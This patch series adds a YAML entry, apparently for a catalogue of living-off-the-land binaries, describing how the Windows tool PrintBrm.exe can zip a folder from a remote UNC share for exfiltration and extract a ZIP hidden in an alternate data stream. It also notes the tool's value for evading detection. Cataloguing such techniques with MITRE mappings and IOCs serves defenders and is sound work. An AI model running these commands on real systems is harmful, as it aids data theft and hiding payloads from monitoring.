From 8f705bb7a4eb65867d6ca001d408f58059709704 Mon Sep 17 00:00:00 2001 From: Elliot Killick Date: Tue, 22 Jun 2021 02:11:27 +0000 Subject: [PATCH 1/3] Create PrintBrm.yml New lolbin for zipping & unzipping to and from UNC paths and ADS. The zip file could also serve as a useful form of obfuscation for evading detection. --- yml/OSBinaries/PrintBrm.yml | 30 ++++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 yml/OSBinaries/PrintBrm.yml diff --git a/yml/OSBinaries/PrintBrm.yml b/yml/OSBinaries/PrintBrm.yml new file mode 100644 index 0000000..643f4b7 --- /dev/null +++ b/yml/OSBinaries/PrintBrm.yml @@ -0,0 +1,30 @@ +--- +Name: PrintBrm.exe +Description: Printer Migration Command-Line Tool +Author: Elliot Killick +Created: 21 Jun 2021 +Commands: + - Command: PrintBrm.exe -b -d \\1.2.3.4\share\example_folder -f C:\Users\user\Desktop\new.zip + Description: Create a ZIP file from a folder in a remote drive + Usecase: Exfiltrate the contents of a remote folder on a UNC share into a zip file + Category: Download + Privileges: User + MitreID: T1105 + MitreLink: https://attack.mitre.org/techniques/T1105/ + OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command: PrintBrm.exe -r -f C:\Users\user\Desktop\data.txt:hidden.zip -d C:\Users\user\Desktop\new_folder + Description: Extract the contents of a ZIP file stored in an Alternate Data Stream (ADS) and store it in a folder + Usecase: Decompress and extract a ZIP file stored on an alternate data stream to a new folder + Category: ADS + Privileges: User + MitreID: T1096 + MitreLink: https://attack.mitre.org/techniques/T1096/ + OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +Full_Path: + - Path: C:\Windows\System32\spool\tools\PrintBrm.exe +Detection: + - IOC: PrintBrm.exe should not be run on a normal workstation +Acknowledgement: + - Person: Elliot Killick + Handle: @elliotkillick +--- From 63af8cca3b48729f800cc1f7baab759c6d9c3472 Mon Sep 17 00:00:00 2001 From: Elliot Killick Date: Sat, 10 Jul 2021 11:54:35 -0400 Subject: [PATCH 2/3] Add resources section and improve formatting --- yml/OSBinaries/PrintBrm.yml | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/yml/OSBinaries/PrintBrm.yml b/yml/OSBinaries/PrintBrm.yml index 643f4b7..a190d87 100644 --- a/yml/OSBinaries/PrintBrm.yml +++ b/yml/OSBinaries/PrintBrm.yml @@ -1,8 +1,8 @@ --- Name: PrintBrm.exe Description: Printer Migration Command-Line Tool -Author: Elliot Killick -Created: 21 Jun 2021 +Author: 'Elliot Killick' +Created: '2021-06-21' Commands: - Command: PrintBrm.exe -b -d \\1.2.3.4\share\example_folder -f C:\Users\user\Desktop\new.zip Description: Create a ZIP file from a folder in a remote drive @@ -24,7 +24,9 @@ Full_Path: - Path: C:\Windows\System32\spool\tools\PrintBrm.exe Detection: - IOC: PrintBrm.exe should not be run on a normal workstation +Resources: + - Link: https://twitter.com/elliotkillick/status/1404117015447670800 Acknowledgement: - Person: Elliot Killick - Handle: @elliotkillick + Handle: '@elliotkillick' --- From 34af96f56445aaede8e340daf7f8d3e46daa5cd8 Mon Sep 17 00:00:00 2001 From: Elliot Killick Date: Thu, 26 Aug 2021 12:21:34 -0400 Subject: [PATCH 3/3] Remove .exe from command --- yml/OSBinaries/PrintBrm.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/yml/OSBinaries/PrintBrm.yml b/yml/OSBinaries/PrintBrm.yml index a190d87..3bbdb2f 100644 --- a/yml/OSBinaries/PrintBrm.yml +++ b/yml/OSBinaries/PrintBrm.yml @@ -4,7 +4,7 @@ Description: Printer Migration Command-Line Tool Author: 'Elliot Killick' Created: '2021-06-21' Commands: - - Command: PrintBrm.exe -b -d \\1.2.3.4\share\example_folder -f C:\Users\user\Desktop\new.zip + - Command: PrintBrm -b -d \\1.2.3.4\share\example_folder -f C:\Users\user\Desktop\new.zip Description: Create a ZIP file from a folder in a remote drive Usecase: Exfiltrate the contents of a remote folder on a UNC share into a zip file Category: Download @@ -12,7 +12,7 @@ Commands: MitreID: T1105 MitreLink: https://attack.mitre.org/techniques/T1105/ OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10 - - Command: PrintBrm.exe -r -f C:\Users\user\Desktop\data.txt:hidden.zip -d C:\Users\user\Desktop\new_folder + - Command: PrintBrm -r -f C:\Users\user\Desktop\data.txt:hidden.zip -d C:\Users\user\Desktop\new_folder Description: Extract the contents of a ZIP file stored in an Alternate Data Stream (ADS) and store it in a folder Usecase: Decompress and extract a ZIP file stored on an alternate data stream to a new folder Category: ADS